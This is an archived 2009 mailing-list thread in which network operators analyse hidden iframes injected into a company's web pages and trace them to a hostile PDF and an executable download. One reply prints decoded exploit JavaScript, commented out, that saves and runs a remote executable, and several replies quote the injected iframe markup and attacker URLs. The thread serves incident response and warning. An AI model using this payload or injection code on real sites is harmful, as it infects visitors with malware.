RE: Malicious code just found on web server
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com -----Original Message----- From: Russell Berg Sent: Friday, April 17, 2009 3:39 PM To: 'nanog@nanog.org' Subject: Malicious code just found on web server We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today: src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> <iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> </body> </html> IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation. Just a heads up for folks; we have a team investigating... Russell Berg Dir - Product Development Airstream Communications berg@wins.net 715-832-3726
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>"); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: <embed src="include/two.pdf" width="1" height="0" style="border:none"></embed> That PDF is on the site, I haven't looked at it yet though. -ChrisAM http://securabit.com On Fri, Apr 17, 2009 at 4:42 PM, Russell Berg <berg@wins.net> wrote:
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com
-----Original Message----- From: Russell Berg Sent: Friday, April 17, 2009 3:39 PM To: 'nanog@nanog.org' Subject: Malicious code just found on web server
We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today:
src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> <iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> </body> </html>
IP address resolves to mail.yaris.com; couldn't find any A/V site references to this.
Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation.
Just a heads up for folks; we have a team investigating...
Russell Berg Dir - Product Development Airstream Communications berg@wins.net 715-832-3726
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate@gmail.com> wrote:
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured): document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
The 1.2.3.4 in the URL is my public IP address (I changed that).
Below the javascript, it grabs a PDF: <embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
That PDF is on the site, I haven't looked at it yet though.
Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location. We've been seeing a lot of this lately. - - ferg -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6P+Oq1pz9mNUZTMRAgINAJ9nFvTfdP0nNB5IXGCR5U5MKvbBxwCgoZQZ 1dYwVrqBqq9k7RVzAhXtYMY= =bmbW -----END PGP SIGNATURE----- -- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster@gmail.com> wrote:
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate@gmail.com> wrote:
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured): document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown| U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
The 1.2.3.4 in the URL is my public IP address (I changed that).
Below the javascript, it grabs a PDF: <embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
That PDF is on the site, I haven't looked at it yet though.
Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location.
We've been seeing a lot of this lately.
Yes, definitely malicious: http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b - - ferg -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w /K0hKsJiAz4RGu8VQkyP+js= =AzJq -----END PGP SIGNATURE----- -- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
You beat me to it. -ChrisAM On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgster@gmail.com> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster@gmail.com> wrote:
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate@gmail.com> wrote:
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured): document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown| U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
The 1.2.3.4 in the URL is my public IP address (I changed that).
Below the javascript, it grabs a PDF: <embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
That PDF is on the site, I haven't looked at it yet though.
Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location.
We've been seeing a lot of this lately.
Yes, definitely malicious:
http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
- - ferg
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w /K0hKsJiAz4RGu8VQkyP+js= =AzJq -----END PGP SIGNATURE-----
-- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Nice, bad code is actually on all of the error (404) pages for the site as well as some other php pages. The code is actually a base64 obfuscation technique to hide the actual attack code. Once decode the code attempts multiple attacks to try and get the victim to download an executable hxxp://77.92.158.122/webmail/inc/web/load.php Virustotal results (3/40) http://www.virustotal.com/analisis/180fc9b96543139b8328f2ae0a2d1bf3 Also this code appears to be trying to exploit specific browser types (Chrome and Mozilla in particular) as can be seen from this code snippet of the decode. (Commented out each line just in case someone has a browser that will try and render this) //aaa_2626aKiupwzqp.setAttribute("style", "display: none; -moz-binding: url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');"); //document.body.appendChild(aaa_2626aKiupwzqp); //var aaa_2626aLiupwzqp = aaa_2626aKiupwzqp.stop.eval.call(null, "Function"); //var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp("return function(C){ var //file=C.classes['@ mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile); file.initW //ithPath('c:\\" + aaa_2626aHiupwzqp + ".exe'); return file; }")(); //window.file = aaa_2626aMiupwzqp(Components); //var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp("return function(C){ return C.classes['@ mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess); //}")(); //window.process = aaa_2626aNiupwzqp(Components); //var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp("return function(C,file){ //io=C.classes['@ mozilla.org/network/io-service;1'].getService(C.interfaces.nsIIOService);source=i //o.newURI('http://77.92.158.122/webmail/inc/web/load.php ','UTF8',null);persist=C.classes['@ mozilla.org/embedding/browser/nsWebBrowserPersist;1'].createI//nstance(C.int //erfaces.nsIWebBrowserPersist);persist.persistFlags=8192|4096;persist.saveURI(source,null,null,null,null,file); return persist; }")(); //window.persist = aaa_2626aOiupwzqp(Components,window.file); //window.getState = aaa_2626aLiupwzqp("return function(persist) { return persist.currentState; }")(); //window.processRun = aaa_2626aLiupwzqp("return function(process,file) { process.init(file); process.run(false,[],0); }")(); Also attempts to download a hostile PDF file from a subdirectory underneath this one which was created with a demo copy of Foxit. hxxp://77.92.158.122/webmail/inc/web/include/two.pdf INFO: Version 2.321001 (possibly) Created: 2009-02-19 1448hrs (-2 timezone) There appear to be several other attacks within this code I can upload or update this thread if you are interested in the other attacks. Jake On Fri, Apr 17, 2009 at 6:34 PM, Chris Mills <securinate@gmail.com> wrote:
You beat me to it.
-ChrisAM
On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgster@gmail.com> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster@gmail.com> wrote:
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate@gmail.com> wrote:
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured): document.write("<embed src=\"hXXp://
77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|<http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C>
U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
The 1.2.3.4 in the URL is my public IP address (I changed that).
Below the javascript, it grabs a PDF: <embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
That PDF is on the site, I haven't looked at it yet though.
Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location.
We've been seeing a lot of this lately.
Yes, definitely malicious:
http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
- - ferg
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w /K0hKsJiAz4RGu8VQkyP+js= =AzJq -----END PGP SIGNATURE-----
-- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate@gmail.com> wrote:
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured): document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown| U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
The 1.2.3.4 in the URL is my public IP address (I changed that).
Below the javascript, it grabs a PDF: <embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
That PDF is on the site, I haven't looked at it yet though.
Not only is that .pdf malicious, when "executed" it also fetches additional malware from: hxxp:// test1.ru /1.1.1/load.php If that host is not in your block list, it should be -- known purveyor of crimeware. This is in addition to the other malicious URLs mentioned in this thread. - - ferg -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI mxM8Ci/feKnJe6M6qbiESPw= =b0Yj -----END PGP SIGNATURE----- -- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Paul, I noticed that in the PDF file but as the domain doesn't seem to have resolution I didn't mention it. Jake WHOIS information on the domain Whois Record domain: TEST1.RU type: CORPORATE nserver: ns1.centerhost.ru. nserver: ns1.cetis.ru. state: REGISTERED, DELEGATED org: Center of Effective Technologies and Systems CETIS phone: +7 4957711654 fax-no: +7 4957879251 e-mail: <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a> e-mail: <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff> registrar: REGRU-REG-RIPN created: 2001.03.30 paid-till: 2010.04.03 source: TC-RIPN Registry Data Created: 2001-03-30 Expires: 2010-04-03 Whois Server: whois.ripn.net Server Data Domain Status: Registered And No Website On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <fergdawgster@gmail.com>wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate@gmail.com> wrote:
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured): document.write("<embed src=\"hXXp:// 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|<http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
The 1.2.3.4 in the URL is my public IP address (I changed that).
Below the javascript, it grabs a PDF: <embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
That PDF is on the site, I haven't looked at it yet though.
Not only is that .pdf malicious, when "executed" it also fetches additional malware from:
hxxp:// test1.ru /1.1.1/load.php
If that host is not in your block list, it should be -- known purveyor of crimeware.
This is in addition to the other malicious URLs mentioned in this thread.
- - ferg
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI mxM8Ci/feKnJe6M6qbiESPw= =b0Yj -----END PGP SIGNATURE-----
-- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
participants (4)
-
Chris Mills -
Jake Mailinglists -
Paul Ferguson -
Russell Berg